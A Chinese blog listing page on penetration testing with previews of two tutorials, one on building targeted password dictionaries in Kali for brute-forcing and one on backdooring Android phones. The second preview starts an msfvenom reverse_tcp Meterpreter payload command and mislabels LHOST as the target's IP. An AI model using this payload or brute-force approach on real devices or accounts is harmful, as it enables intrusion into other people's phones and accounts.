web渗透测试
-_Ryan_-
这个作者很懒,什么都没留下…
展开
-
kali下如何生成密码字典(在线)
写在前面:本文仅限学术交流,请勿用他人实践其实kali系统是有自带的密码字典的,但是作为一个通用性字典可能在实际操作中只能起到一个辅助性的作用。所以就需要针对你的攻击对象作出一套更加贴合实际的字典来用,这样效率会快很多。首先梳理一下正常人设置密码的思路,无非就是好记,那么就会大量重复使用一个或几个密码在各种平台上。例如我的CSDN密码和我的Github密码是一样的,也是为了好记。所以在暴力破解时知道一些已知密码是最理想的状态。但是大多数情况下我们并不会这么幸运。所以还是要绕道字典问题上来。像我,一般原创 2022-02-13 23:12:12 · 9284 阅读 · 2 评论 -
Kali 下对安卓手机的攻击
写在前面:本文仅限学术交流,请勿用他人实践Kali对安卓手机的攻击(渗透)我们首先需要确定本机IP这很简单,对于Kali来说我们需要打开终端并键入ifconfig即可获取自己的IP,然后我们需要确定安卓手机也就是被攻击者的IP,只需键入fping -g 本机IP地址/24这时我们就能确定目标IP,这次教程主要围绕创建后门程序展开在终端中执行:# msfvenom -p android/meterpreter/reverse_tcp LHOST=目标IP LPORT=原创 2022-01-29 20:27:44 · 10798 阅读 · 17 评论